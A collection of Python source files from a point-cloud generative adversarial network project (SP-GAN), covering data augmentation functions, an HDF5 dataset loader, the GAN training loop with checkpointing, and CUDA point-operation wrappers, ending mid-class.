lr_step = 20 if dataset == "m40" else 40
train(agent, logger, dataset, noise_type, epochs=epochs, lr=lr, lr_step=lr_step,
alpha=alpha, reward_mode=reward_mode, model_path=model_path)
``` |
{
"source": "JiazeWang/SP-GAN",
"score": 2
} |
#### File: SP-GAN/Common/point_operation.py
```python
import numpy as np
def nonuniform_sampling(num = 4096, sample_num = 1024):
sample = set()
loc = np.random.rand()*0.8+0.1
while(len(sample)<sample_num):
a = int(np.random.normal(loc=loc,scale=0.3)*num)
if a<0 or a>=num:
continue
sample.add(a)
return list(sample)
def normalize_point_cloud(inputs):
"""
input: pc [N, P, 3]
output: pc, centroid, furthest_distance
"""
#print("shape",input.shape)
C = inputs.shape[-1]
pc = inputs[:,:,:3]
if C > 3:
nor = inputs[:,:,3:]
centroid = np.mean(pc, axis=1, keepdims=True)
pc = inputs[:,:,:3] - centroid
furthest_distance = np.amax(
np.sqrt(np.sum(pc ** 2, axis=-1, keepdims=True)), axis=1, keepdims=True)
pc = pc / furthest_distance
if C > 3:
return np.concatenate([pc,nor],axis=-1)
else:
return pc
def shuffle_point_cloud_and_gt(batch_data,batch_gt=None):
B,N,C = batch_data.shape
idx = np.arange(N)
np.random.shuffle(idx)
batch_data = batch_data[:,idx,:]
if batch_gt is not None:
np.random.shuffle(idx)
batch_gt = batch_gt[:,idx,:]
return batch_data,batch_gt
def shuffle_data(data, labels):
""" Shuffle data and labels.
Input:
data: B,N,... numpy array
label: B,... numpy array
Return:
shuffled data, label and shuffle indices
"""
idx = np.arange(len(labels))
np.random.shuffle(idx)
return data[idx, ...], labels[idx]
def rotate_point_cloud_by_angle_batch(batch_data, rotation_angle):
""" Rotate the point cloud along up direction with certain angle.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, rotated batch of point clouds
"""
rotated_data = np.zeros(batch_data.shape, dtype=np.float32)
for k in range(batch_data.shape[0]):
#rotation_angle = np.random.uniform() * 2 * np.pi
cosval = np.cos(rotation_angle)
sinval = np.sin(rotation_angle)
rotation_matrix = np.array([[cosval, 0, sinval],
[0, 1, 0],
[-sinval, 0, cosval]])
shape_pc = batch_data[k, ...]
rotated_data[k, ...] = np.dot(shape_pc.reshape((-1, 3)), rotation_matrix)
return rotated_data
def rotate_point_cloud_and_gt(pc,gt=None,y_rotated=True):
""" Randomly rotate the point clouds to augument the dataset
rotation is per shape based along up direction
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, rotated batch of point clouds
"""
angles = np.random.uniform(size=(3)) * 2 * np.pi
Rx = np.array([[1, 0, 0],
[0, np.cos(angles[0]), -np.sin(angles[0])],
[0, np.sin(angles[0]), np.cos(angles[0])]])
Ry = np.array([[np.cos(angles[1]), 0, np.sin(angles[1])],
[0, 1, 0],
[-np.sin(angles[1]), 0, np.cos(angles[1])]])
Rz = np.array([[np.cos(angles[2]), -np.sin(angles[2]), 0],
[np.sin(angles[2]), np.cos(angles[2]), 0],
[0, 0, 1]])
if y_rotated:
rotation_matrix = Ry
else:
rotation_matrix = np.dot(Rz, np.dot(Ry, Rx))
pc = np.dot(pc, rotation_matrix)
if gt is not None:
gt = np.dot(gt, rotation_matrix)
return pc, gt
return pc
def jitter_perturbation_point_cloud(pc, sigma=0.01, clip=0.02):
""" Randomly jitter points. jittering is per point.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, jittered batch of point clouds
"""
N, C = pc.shape
assert(clip > 0)
jittered_data = np.clip(sigma * np.random.randn(N, C), -1*clip, clip)
jittered_data += pc
return jittered_data
def jitter_perturbation_point_cloud_bt(batch_data, sigma=0.01, clip=0.02):
""" Randomly jitter points. jittering is per point.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, jittered batch of point clouds
"""
jittered_data = np.zeros(batch_data.shape, dtype=np.float32)
_, N, C = batch_data.shape
for k in range(batch_data.shape[0]):
# rotation_angle = np.random.uniform() * 2 * np.pi
noise = np.clip(sigma * np.random.randn(N, C), -1 * clip, clip)
shape_pc = batch_data[k, ...]
jittered_data[k, ...] = shape_pc + noise
return jittered_data
def shift_point_cloud_and_gt(pc, gt = None, shift_range=0.1):
""" Randomly shift point cloud. Shift is per point cloud.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, shifted batch of point clouds
"""
N, C = pc.shape
shifts = np.random.uniform(-shift_range, shift_range, (3))
pc = pc + shifts
if gt is not None:
gt = gt + shifts
return pc, gt
return pc
def translate_pointcloud(pointcloud):
xyz1 = np.random.uniform(low=2. / 3., high=3. / 2., size=[3])
xyz2 = np.random.uniform(low=-0.2, high=0.2, size=[3])
translated_pointcloud = np.add(np.multiply(pointcloud, xyz1), xyz2).astype('float32')
return translated_pointcloud
def random_scale_point_cloud_and_gt(pc, gt = None, scale_low=0.8, scale_high=1.25):
""" Randomly scale the point cloud. Scale is per point cloud.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, scaled batch of point clouds
"""
N, C = pc.shape
scale = np.random.uniform(scale_low, scale_high, 1)
pc = pc * scale
if gt is not None:
gt = gt * scale
return pc, gt, scale
return pc
def rotate_perturbation_point_cloud(pc, angle_sigma=0.06, angle_clip=0.18):
""" Randomly perturb the point clouds by small rotations
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, rotated batch of point clouds
"""
N, C = pc.shape
angles = np.clip(angle_sigma*np.random.randn(3), -angle_clip, angle_clip)
Rx = np.array([[1,0,0],
[0,np.cos(angles[0]),-np.sin(angles[0])],
[0,np.sin(angles[0]),np.cos(angles[0])]])
Ry = np.array([[np.cos(angles[1]),0,np.sin(angles[1])],
[0,1,0],
[-np.sin(angles[1]),0,np.cos(angles[1])]])
Rz = np.array([[np.cos(angles[2]),-np.sin(angles[2]),0],
[np.sin(angles[2]),np.cos(angles[2]),0],
[0,0,1]])
R = np.dot(Rz, np.dot(Ry,Rx))
pc = np.dot(pc, R)
return pc
def guass_noise_point_cloud(batch_data, sigma=0.005, mu=0.00):
""" Add guassian noise in per point.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, jittered batch of point clouds
"""
batch_data += np.random.normal(mu, sigma, batch_data.shape)
return batch_data
def rotate_point_cloud_by_angle(self, data, rotation_angle):
"""
Rotate the point cloud along up direction with certain angle.
:param batch_data: Nx3 array, original batch of point clouds
:param rotation_angle: range of rotation
:return: Nx3 array, rotated batch of point clouds
"""
cosval = np.cos(rotation_angle)
sinval = np.sin(rotation_angle)
rotation_matrix = np.array([[cosval, 0, sinval],
[0, 1, 0],
[-sinval, 0, cosval]])
rotated_data = np.dot(data, rotation_matrix)
return rotated_data
```
#### File: SP-GAN/Generation/H5DataLoader.py
```python
import numpy as np
import warnings
import h5py
from torch.utils.data import Dataset
from glob import glob
from Common import point_operation
import os
warnings.filterwarnings('ignore')
from torchvision import transforms
from Common import data_utils as d_utils
from Common import point_operation
import torch
def load_h5(h5_filename,num=2048):
f = h5py.File(h5_filename)
data = f['poisson_%d'%num][:]
return data
point_transform = transforms.Compose(
[
d_utils.PointcloudToTensor(),
d_utils.PointcloudRotate(),
d_utils.PointcloudRotatePerturbation(),
d_utils.PointcloudScale(),
d_utils.PointcloudTranslate(),
d_utils.PointcloudJitter(),
#d_utils.PointcloudRandomInputDropout(),
]
)
point_transform2 = transforms.Compose(
[
d_utils.PointcloudToTensor(),
d_utils.PointcloudScale(),
d_utils.PointcloudTranslate(),
#d_utils.PointcloudRandomInputDropout(),
]
)
class H5DataLoader(Dataset):
def __init__(self, opts,augment=False, partition='train'):
self.opts = opts
self.num_points = opts.np
self.con = opts.con
if self.con:
cats = ["chair","table","bench"][:opts.cls]
pcs = []
labels = []
for i, cat in enumerate(cats):
h5_file = os.path.join(opts.data_root, str(self.num_points), str(cat).lower() + ".h5")
print("---------------h5_file:", h5_file)
pc = load_h5(h5_file, self.num_points)
pc = point_operation.normalize_point_cloud(pc)
label = np.ones((pc.shape[0],))*i
pcs.append(pc)
labels.append(label)
self.data = np.concatenate(pcs,axis=0)
self.labels = np.concatenate(labels, axis=0).astype(np.int32)
print(self.labels.shape)
# elif opts.choice == "animal":
# pcs = []
# for i in range(5):
# h5_file = os.path.join(opts.data_root, str(self.num_points), str(opts.choice).lower(), str(opts.choice).lower() + "_%d.h5"%i)
# print("---------------h5_file:", h5_file)
# pc = load_h5(h5_file, self.num_points)
# pc = point_operation.normalize_point_cloud(pc)
# pcs.append(pc)
#
# self.data = np.concatenate(pcs,axis=0)
elif opts.choice == "animal_all":
pcs = []
cats = ["animal-pose", "animal-deform"]
for cat in cats:
h5_file = os.path.join(opts.data_root, str(self.num_points), str(cat).lower() + ".h5")
print("---------------h5_file:", h5_file)
pc = load_h5(h5_file, self.num_points)
pc = point_operation.normalize_point_cloud(pc)
pcs.append(pc)
self.data = np.concatenate(pcs, axis=0)
elif opts.choice == "bottle":
pcs = []
cats = ["bottle","jar","pot"]
for cat in cats:
h5_file = os.path.join(opts.data_root, str(self.num_points), str(cat).lower() + ".h5")
print("---------------h5_file:", h5_file)
pc = load_h5(h5_file, self.num_points)
pc = point_operation.normalize_point_cloud(pc)
pcs.append(pc)
self.data = np.concatenate(pcs,axis=0)
else:
h5_file = os.path.join(opts.data_root, str(self.num_points), str(opts.choice).lower()+".h5")
print("---------------h5_file:",h5_file)
self.data = load_h5(h5_file,self.num_points)
self.labels = None
self.data = self.opts.scale * point_operation.normalize_point_cloud(self.data)
self.augment = augment
self.partition = partition
def __len__(self):
return len(self.data)
def __getitem__(self, index):
point_set = self.data[index][:self.num_points,:3].copy()
np.random.shuffle(point_set)
if self.augment:
point_set = point_operation.rotate_point_cloud_and_gt(point_set)
point_set = point_operation.random_scale_point_cloud_and_gt(point_set)
point_set = point_set.astype(np.float32)
if self.con:
label = self.labels[index].copy()
return torch.Tensor(point_set), torch.Tensor(label)
return torch.from_numpy(point_set)
```
#### File: SP-GAN/Generation/model.py
```python
import numpy as np
import math
import sys
import os
import time
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torch.autograd import Variable
import torch.nn.functional as F
import logging
import random
import imageio
# add for shape-preserving Loss
from Common.point_operation import normalize_point_cloud
from Generation.H5DataLoader import H5DataLoader
from collections import namedtuple
# from pointnet2.pointnet2_modules import PointNet2SAModule, PointNet2SAModuleMSG
from Common.loss_utils import ChamferLoss,pairwise_CD
from Common import point_operation
from Common import data_utils as d_util
from Common.loss_utils import get_local_pair,compute_all_metrics2,AverageValueMeter,dist_simple
from Common import loss_utils
from tensorboardX import SummaryWriter
from Common.visu_utils import plot_pcd_three_views,point_cloud_three_views,plot_pcd_multi_rows
from tqdm import tqdm
#from Generation.Generator import Generator
from Generation.Generator_advanced_model import Generator
from Generation.Discriminator import Discriminator
from Common.network_utils import *
import copy
from pprint import pprint
cudnn.benchnark=True
seed = 123
random.seed(seed)
#np.random.seed(seed)
torch.manual_seed(seed)
#torch.cuda.manual_seed(seed)
#torch.cuda.manual_seed_all(seed)
def pc_normalize(pc):
l = pc.shape[0]
centroid = np.mean(pc, axis=0)
pc = pc - centroid
m = np.max(np.sqrt(np.sum(pc**2, axis=1)))
pc = pc / m
return pc
class Model(object):
def __init__(self, opts):
self.opts = opts
def backup(self):
if self.opts.phase == 'train':
source_folder = os.path.join(os.getcwd(),"Generation")
common_folder = os.path.join(os.getcwd(),"Common")
data_folder = os.path.join(os.getcwd(), "data_utils")
os.system("cp %s/Generator.py '%s/Generator.py'" % (source_folder,self.opts.log_dir))
os.system("cp %s/Discriminator.py '%s/Discriminator.py'" % (source_folder,self.opts.log_dir))
os.system("cp %s/model.py '%s/model.py'" % (source_folder,self.opts.log_dir))
os.system("cp %s/loss_utils.py '%s/loss_utils.py'" % (common_folder,self.opts.log_dir))
os.system("cp %s/H5DataLoader.py '%s/H5DataLoader.py'" % (data_folder,self.opts.log_dir))
def build_model(self):
""" Models """
self.G = Generator(self.opts)
self.D = Discriminator(self.opts)
self.multi_gpu = False
if torch.cuda.device_count() > 1:
print("Let's use", torch.cuda.device_count(), "GPUs!")
# dim = 0 [30, xxx] -> [10, ...], [10, ...], [10, ...] on 3 GPUs
self.G = nn.DataParallel(self.G)
self.D = nn.DataParallel(self.D)
self.multi_gpu = True
print('# generator parameters:', sum(param.numel() for param in self.G.parameters()))
print('# discriminator parameters:', sum(param.numel() for param in self.D.parameters()))
self.G.cuda()
self.D.cuda()
""" Training """
beta1 = 0.5
beta2 = 0.99
self.optimizerG = optim.Adam(filter(lambda p: p.requires_grad, self.G.parameters()), lr=self.opts.lr_g, betas=(beta1, beta2))
self.optimizerD = optim.Adam(filter(lambda p: p.requires_grad, self.D.parameters()), lr=self.opts.lr_d, betas=(beta1, beta2))
if self.opts.lr_decay:
if self.opts.use_sgd:
self.scheduler_G = torch.optim.lr_scheduler.CosineAnnealingLR(self.optimizerG, self.opts.max_epoch, eta_min=self.opts.lr_g)
else:
self.scheduler_G = torch.optim.lr_scheduler.StepLR(self.optimizerG, step_size=self.opts.lr_decay_feq, gamma=self.opts.lr_decay_rate)
else:
self.scheduler_G = None
if self.opts.lr_decay:
self.scheduler_D = torch.optim.lr_scheduler.StepLR(self.optimizerD, step_size=self.opts.lr_decay_feq, gamma=self.opts.lr_decay_rate)
else:
self.scheduler_D = None
# define tensors
self.z = torch.FloatTensor(self.opts.bs, self.opts.nz).cuda()
self.z = Variable(self.z)
self.ball = None
label = torch.full((self.opts.bs,), 1).cuda()
ones = torch.full((self.opts.bs,), 1).cuda()
self.fix_z = None
def noise_generator(self, bs=1,masks=None):
if masks is None:
if self.opts.n_rand:
noise = np.random.normal(0, self.opts.nv, (bs, self.opts.np, self.opts.nz))
else:
noise = np.random.normal(0, self.opts.nv, (bs, 1, self.opts.nz))
#scale = self.opts.nv
#w = np.random.uniform(low=-scale, high=scale, size=(bs, 1, self.opts.nz))
noise = np.tile(noise,(1,self.opts.np,1))
if self.opts.n_mix and random.random() < 0.5:
noise2 = np.random.normal(0, self.opts.nv, (bs, self.opts.nz))
for i in range(bs):
id = np.random.randint(0,self.opts.np)
idx = np.argsort(self.ball_dist[id])[::1]
# idx = np.arange(self.opts.np)
# np.random.shuffle(idx)
num = int(max(random.random(),0.1)*self.opts.np)
noise[i, idx[:num]] = noise2[i]
else:
noise = np.zeros((bs, self.opts.np, self.opts.nz))
for i in range(masks.shape[0]):
mask = masks[i]
unique_mask = np.unique(mask)
for j in unique_mask:
noise_once = np.random.normal(0, 0.2, (1, self.opts.nz))
idx = np.where(mask == j)
noise[i,idx] = idx
sim_noise = Variable(torch.Tensor(noise)).cuda()
return sim_noise
def sphere_generator(self,bs=2,static=True):
if self.ball is None:
self.ball = np.loadtxt('template/balls/%d.xyz'%self.opts.np)[:,:3]
self.ball = pc_normalize(self.ball)
N = self.ball.shape[0]
# xx = torch.bmm(x, x.transpose(2,1))
xx = np.sum(self.ball ** 2, axis=(1)).reshape(N, 1)
yy = xx.T
xy = -2 * xx @ yy # torch.bmm(x, y.permute(0, 2, 1))
self.ball_dist = xy + xx + yy # [B, N, N]
if static:
ball = np.expand_dims(self.ball, axis=0)
ball = np.tile(ball, (bs, 1, 1))
else:
ball = np.zeros((bs, self.opts.np, 3))
for i in range(bs):
idx = np.random.choice(self.ball.shape[0], self.opts.np)
ball[i] = self.ball[idx]
ball = Variable(torch.Tensor(ball)).cuda()
return ball
def train(self):
global epoch
self.build_model()
self.backup()
start_epoch = 1
# restore check-point if it exits
if self.opts.restore:
could_load, save_epoch = self.load(self.opts.log_dir)
if could_load:
start_epoch = save_epoch
print(" [*] Load SUCCESS")
self.LOG_FOUT = open(os.path.join(self.opts.log_dir, 'log_train.txt'), 'a')
else:
print('training...')
self.LOG_FOUT = open(os.path.join(self.opts.log_dir, 'log_train.txt'), 'w')
self.LOG_FOUT.write(str(self.opts) + '\n')
self.log_string('PARAMETER ...')
with open(os.path.join(self.opts.log_dir, 'args.txt'), 'w') as log:
for arg in sorted(vars(self.opts)):
log.write(arg + ': ' + str(getattr(self.opts, arg)) + '\n') # log of arguments
pprint(self.opts)
self.writer = None#SummaryWriter(logdir=self.opts.log_dir)
'''DATA LOADING'''
self.log_string('Load dataset ...')
self.train_dataset = H5DataLoader(self.opts, augment=self.opts.augment)
self.dataloader = torch.utils.data.DataLoader(self.train_dataset, batch_size=self.opts.bs,
shuffle=True, num_workers=int(self.opts.workers),drop_last=True,pin_memory=True)
self.num_batches = len(self.train_dataset) // self.opts.bs
self.z_test = torch.FloatTensor(self.opts.bs, self.opts.nz).cuda()
self.z_test.data.resize_(self.opts.bs, self.opts.nz).normal_(0.0, 1.0)
# loop for epoch
start_time = time.time()
d_avg_meter = AverageValueMeter()
g_avg_meter = AverageValueMeter()
real_acc_avg_meter = AverageValueMeter()
fake_acc_avg_meter = AverageValueMeter()
global_step = 0
d_para = 1.0
g_para = 1.0
x = self.sphere_generator(bs=self.opts.bs)
self.fix_z = self.noise_generator(bs=64)
for epoch in range(start_epoch, self.opts.max_epoch+1):
self.D.train()
self.G.train()
step_d = 0
step_g = 0
for idx, data in tqdm(enumerate(self.dataloader, 0),total=len(self.dataloader)):
requires_grad(self.G, False)
requires_grad(self.D, True)
self.optimizerD.zero_grad()
real_points = Variable(data,requires_grad=True)
z = self.noise_generator(bs=self.opts.bs)
d_fake_preds =self.G(x, z)
real_points = real_points.transpose(2, 1).cuda()
d_fake_preds = d_fake_preds.detach()
d_real_logit = self.D(real_points)
d_fake_logit = self.D(d_fake_preds)
lossD,info= loss_utils.dis_loss(d_real_logit,d_fake_logit,gan=self.opts.gan,noise_label=self.opts.flip_d)
lossD.backward()
self.optimizerD.step()
# -----------------------------------train G-----------------------------------
requires_grad(self.G, True)
requires_grad(self.D, False)
self.optimizerG.zero_grad()
z = self.noise_generator(bs=self.opts.bs)
g_fake_preds =self.G(x, z)
g_real_logit = self.D(real_points)
g_fake_logit = self.D(g_fake_preds)
lossG,_ = loss_utils.gen_loss(g_real_logit,g_fake_logit,gan=self.opts.gan,noise_label=self.opts.flip_g)
lossG.backward()
self.optimizerG.step()
d_avg_meter.update(lossD.item())
g_avg_meter.update(lossG.item())
real_acc_avg_meter.update(info['real_acc'])
fake_acc_avg_meter.update(info['fake_acc'])
if self.writer is not None:
self.writer.add_scalar("loss/d_Loss", lossD.data, global_step)
self.writer.add_scalar("loss/g_Loss", lossG.data, global_step)
self.writer.add_scalar("acc/real_acc", info['real_acc'], global_step)
self.writer.add_scalar("acc/fake_acc", info['fake_acc'], global_step)
self.writer.add_histogram('d_real_logit', d_real_logit, global_step)
self.writer.add_histogram('d_fake_logit', d_fake_logit, global_step)
self.writer.add_histogram('g_fake_logit', g_fake_logit, global_step)
#optimizer.param_groups[0]['lr']
#scheduler_G.get_lr()[0]
self.writer.add_scalar("lr/lr_g", self.optimizerG.param_groups[0]['lr'], global_step)
self.writer.add_scalar("lr/lr_d", self.optimizerD.param_groups[0]['lr'], global_step)
global_step +=1
if self.opts.save and global_step%20==0:
requires_grad(self.G, False)
self.draw_sample_save(epoch=epoch,step=global_step)
requires_grad(self.G, True)
if self.scheduler_G is not None:
self.scheduler_G.step(epoch)
if self.scheduler_D is not None:
self.scheduler_D.step(epoch)
time_tick = time.time() - start_time
self.log_string("Epoch: [%2d] time: %2dm %2ds d_loss4: %.8f, g_loss: %.8f" \
% (epoch, time_tick / 60, time_tick % 60, d_avg_meter.avg, g_avg_meter.avg))
self.log_string("real_acc: %f fake_acc: %f" % (real_acc_avg_meter.avg, fake_acc_avg_meter.avg))
self.log_string("lr_g: %f lr_d: %f" % (self.optimizerG.param_groups[0]['lr'], self.optimizerD.param_groups[0]['lr']))
print("step_d:%d step_g:%d"%(step_d,step_g))
# if self.scheduler_G is not None and self.scheduler_D is not None:
# print("lr_g: %f lr_d: %f"%(self.scheduler_G.get_lr()[0],self.scheduler_D.get_lr()[0]))
requires_grad(self.G, False)
requires_grad(self.D, True)
if epoch % self.opts.snapshot == 0:
self.save(self.opts.log_dir, epoch)
if False and not self.opts.save:
self.draw_sample(epoch)
self.save(self.opts.log_dir, epoch)
self.LOG_FOUT.close()
def draw_sample(self, epoch):
eval_dir = os.path.join(self.opts.log_dir, "plot")
if not os.path.exists(eval_dir):
os.makedirs(eval_dir)
grid_x = 8
grid_y = 8
x = self.sphere_generator(bs=grid_y)
pcds_list = []
title_list = []
for i in range(grid_x):
title = ["S_%d" % (i * grid_y + j) for j in range(grid_y)]
with torch.no_grad():
#z = self.noise_generator(bs=grid_y)
z = self.fix_z[i*grid_y:(i+1)*grid_y]
out_pc = self.G(x, z)
out_pc = out_pc.transpose(2, 1)
sample_pcs = out_pc.cpu().detach().numpy()
sample_pcs = normalize_point_cloud(sample_pcs)
pcds_list.append(0.75 * sample_pcs)
title_list.append(title)
plot_name = os.path.join(eval_dir, str(epoch) + ".png")
plot_pcd_multi_rows(plot_name, pcds_list, title_list, cmap="Reds")
def draw_sample_save(self, epoch, step):
eval_dir = os.path.join(self.opts.log_dir, "plot")
if not os.path.exists(eval_dir):
os.makedirs(eval_dir)
grid_x = 8
grid_y = 8
x = self.sphere_generator(bs=grid_y)
pcds_list = []
title_list = []
for i in range(grid_x):
title = ["S_%d" % (i * grid_y + j) for j in range(grid_y)]
with torch.no_grad():
#z = self.noise_generator(bs=grid_y)
z = self.fix_z[i*grid_y:(i+1)*grid_y]
out_pc = self.G(x, z)
out_pc = out_pc.transpose(2, 1)
sample_pcs = out_pc.cpu().detach().numpy()
sample_pcs = normalize_point_cloud(sample_pcs)
pcds_list.append(0.75 * sample_pcs)
title_list.append(title)
plot_name = os.path.join(eval_dir, str(step) + ".png")
plot_pcd_multi_rows(plot_name, pcds_list, title_list, cmap="Reds")
for i in range(grid_x):
pcs = normalize_point_cloud(pcds_list[i])
for j in range(grid_y):
id = i*grid_y+j
save_folder = os.path.join(eval_dir,"sample",str(id))
if not os.path.exists(save_folder):
os.makedirs(save_folder)
save_name = os.path.join(save_folder,"%d_step_%d.xyz"%(id,step))
np.savetxt(save_name,pcs[j],fmt="%.6f")
def test_once(self,epoch):
#self.G.eval()
eval_dir = os.path.join(self.opts.log_dir,"plot")
if not os.path.exists(eval_dir):
os.makedirs(eval_dir)
bs = 4
# x = np.loadtxt('template/ball.xyz')
# x = pc_normalize(x)
# x = np.expand_dims(x, axis=0)
# x = np.tile(x, (bs, 1, 1))
# x = Variable(torch.Tensor(x)).cuda()
x = self.sphere_generator(bs=bs)
#if self.fix_z is None:
self.fix_z = self.noise_generator(bs=bs)
gen_points4 = self.G(x,self.fix_z)
# print(gen_points.shape)
gen_points4 = gen_points4.transpose(2, 1).cpu().data.numpy() # Bx3x2048 -> Bx2048x3
gen_points4 = point_operation.normalize_point_cloud(gen_points4)
pcds = [gen_points4[0], gen_points4[1], gen_points4[2], gen_points4[3]]
# print(type(pcds), len(pcds))
# np.asarray(pcds).reshape([3,self.opts.num_point,3])
plot_path = os.path.join(eval_dir, str(epoch) + ".png")
visualize_titles = ['S1', 'S2', 'S3', 'S4']
plot_pcd_three_views(plot_path, pcds, visualize_titles)
def log_string(self, out_str):
self.LOG_FOUT.write(out_str+'\n')
self.LOG_FOUT.flush()
print(out_str)
def set_logger(self):
self.logger = logging.getLogger("CLS")
self.logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
file_handler = logging.FileHandler(os.path.join(self.opts.log_dir, "log_%s.txt" % self.opts.phase))
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
def load(self, checkpoint_dir):
if self.opts.pretrain_model_G is None and self.opts.pretrain_model_D is None:
print('################ new training ################')
return False, 1
print(" [*] Reading checkpoints...")
#checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir, self.model_name)
# ----------------- load G -------------------
if not self.opts.pretrain_model_G is None:
resume_file_G = os.path.join(checkpoint_dir, self.opts.pretrain_model_G)
flag_G = os.path.isfile(resume_file_G),
if flag_G == False:
print('G--> Error: no checkpoint directory found!')
exit()
else:
print('resume_file_G------>: {}'.format(resume_file_G))
checkpoint = torch.load(resume_file_G)
self.G.load_state_dict(checkpoint['G_model'])
self.optimizerG.load_state_dict(checkpoint['G_optimizer'])
G_epoch = checkpoint['G_epoch']
else:
print(" [*] Failed to find the pretrain_model_G")
exit()
# ----------------- load D -------------------
if not self.opts.pretrain_model_D is None:
resume_file_D = os.path.join(checkpoint_dir, self.opts.pretrain_model_D)
flag_D = os.path.isfile(resume_file_D)
if flag_D == False:
print('D--> Error: no checkpoint directory found!')
exit()
else:
print('resume_file_D------>: {}'.format(resume_file_D))
checkpoint = torch.load(resume_file_D)
self.D.load_state_dict(checkpoint['D_model'])
D_epoch = checkpoint['D_epoch']
else:
print(" [*] Failed to find the pretrain_model_D")
exit()
print(" [*] Success to load model --> {} & {}".format(self.opts.pretrain_model_G, self.opts.pretrain_model_D))
return True, G_epoch
def save(self, checkpoint_dir, index_epoch):
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
save_name = str(index_epoch)+'_'+self.opts.choice
path_save_G = os.path.join(checkpoint_dir, save_name+'_G.pth')
path_save_D = os.path.join(checkpoint_dir, save_name+'_D.pth')
print('Save Path for G: {}'.format(path_save_G))
print('Save Path for D: {}'.format(path_save_D))
torch.save({
'G_model':self.G.module.state_dict() if self.multi_gpu else self.G.state_dict(),
'G_optimizer': self.optimizerG.state_dict() ,
'G_epoch': index_epoch,
}, path_save_G)
torch.save({
# 'D_model1': self.discriminator1.state_dict(),
# 'D_model2': self.discriminator2.state_dict(),
# 'D_model3': self.discriminator3.state_dict(),
'D_model': self.D.module.state_dict() if self.multi_gpu else self.D.state_dict(),
'D_optimizer': self.optimizerD.state_dict(),
# 'D_optimizer2': self.optimizerD2.state_dict(),
# 'D_optimizer3': self.optimizerD3.state_dict(),
# 'D_optimizer4': self.optimizerD.state_dict(),
'D_epoch': index_epoch,
}, path_save_D)
# torch.save(G, os.path.join(opt.outd, opt.outm, f'G_nch-{opt.nch}_epoch-{epoch}.pth'))
# torch.save(D, os.path.join(opt.outd, opt.outm, f'D_nch-{opt.nch}_epoch-{epoch}.pth'))
# torch.save(Gs, os.path.join(opt.outd, opt.outm, f'Gs_nch-{opt.nch}_epoch-{epoch}.pth'))
```
#### File: metrics/pointops/pointops_util.py
```python
from typing import Tuple
import torch
from torch.autograd import Function
import torch.nn as nn
from metrics.pointops import pointops_cuda
import numpy as np
class FurthestSampling(Function):
@staticmethod
def forward(ctx, xyz, m):
"""
input: xyz: (b, n, 3) and n > m, m: int32
output: idx: (b, m)
"""
assert xyz.is_contiguous()
b, n, _ = xyz.size()
idx = torch.cuda.IntTensor(b, m)
temp = torch.cuda.FloatTensor(b, n).fill_(1e10)
pointops_cuda.furthestsampling_cuda(b, n, m, xyz, temp, idx)
return idx
@staticmethod
def backward(xyz, a=None):
return None, None
furthestsampling = FurthestSampling.apply
class Gathering(Function):
@staticmethod
def forward(ctx, features, idx):
"""
input: features: (b, c, n), idx : (b, m) tensor
output: (b, c, m)
"""
assert features.is_contiguous()
assert idx.is_contiguous()
b, c, n = features.size()
m = idx.size(1)
output = torch.cuda.FloatTensor(b, c, m)
pointops_cuda.gathering_forward_cuda(b, c, n, m, features, idx, output)
ctx.for_backwards = (idx, c, n)
return output
@staticmethod
def backward(ctx, grad_out):
idx, c, n = ctx.for_backwards
b, m = idx.size()
grad_features = torch.cuda.FloatTensor(b, c, n).zero_()
grad_out_data = grad_out.data.contiguous()
pointops_cuda.gathering_backward_cuda(b, c, n, m, grad_out_data, idx, grad_features.data)
return grad_features, None
gathering = Gathering.apply
class NearestNeighbor(Function):
@staticmethod
def forward(ctx, unknown: torch.Tensor, known: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Find the three nearest neighbors of unknown in known
input: unknown: (b, n, 3), known: (b, m, 3)
output: dist2: (b, n, 3) l2 distance to the three nearest neighbors
idx: (b, n, 3) index of 3 nearest neighbors
"""
assert unknown.is_contiguous()
assert known.is_contiguous()
b, n, _ = unknown.size()
m = known.size(1)
dist2 = torch.cuda.FloatTensor(b, n, 3)
idx = torch.cuda.IntTensor(b, n, 3)
pointops_cuda.nearestneighbor_cuda(b, n, m, unknown, known, dist2, idx)
return torch.sqrt(dist2), idx
@staticmethod
def backward(ctx, a=None, b=None):
return None, None
nearestneighbor = NearestNeighbor.apply
class Interpolation(Function):
@staticmethod
def forward(ctx, features: torch.Tensor, idx: torch.Tensor, weight: torch.Tensor) -> torch.Tensor:
"""
Performs weight linear interpolation on 3 features
input: features: (b, c, m) features descriptors to be interpolated from
idx: (b, n, 3) three nearest neighbors of the target features in features
weight: (b, n, 3) weights
output: (b, c, n) tensor of the interpolated features
"""
assert features.is_contiguous()
assert idx.is_contiguous()
assert weight.is_contiguous()
b, c, m = features.size()
n = idx.size(1)
ctx.interpolation_for_backward = (idx, weight, m)
output = torch.cuda.FloatTensor(b, c, n)
pointops_cuda.interpolation_forward_cuda(b, c, m, n, features, idx, weight, output)
return output
@staticmethod
def backward(ctx, grad_out: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
"""
input: grad_out: (b, c, n)
output: grad_features: (b, c, m), None, None
"""
idx, weight, m = ctx.interpolation_for_backward
b, c, n = grad_out.size()
grad_features = torch.cuda.FloatTensor(b, c, m).zero_()
grad_out_data = grad_out.data.contiguous()
pointops_cuda.interpolation_backward_cuda(b, c, n, m, grad_out_data, idx, weight, grad_features.data)
return grad_features, None, None
interpolation = Interpolation.apply
class Grouping(Function):
@staticmethod
def forward(ctx, features: torch.Tensor, idx: torch.Tensor) -> torch.Tensor:
"""
input: features: (b, c, n), idx : (b, m, nsample) containing the indicies of features to group with
output: (b, c, m, nsample)
"""
assert features.is_contiguous()
